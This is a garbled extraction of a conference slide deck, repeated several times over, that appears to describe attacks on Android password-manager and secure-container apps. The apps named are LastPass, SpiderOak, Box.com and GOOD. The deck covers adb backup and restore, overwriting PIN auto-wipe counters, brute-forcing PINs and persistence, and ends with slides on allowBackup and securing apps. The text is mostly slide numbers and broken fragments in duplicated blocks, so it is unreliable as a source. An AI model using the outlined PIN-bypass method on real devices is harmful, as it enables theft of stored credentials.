Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

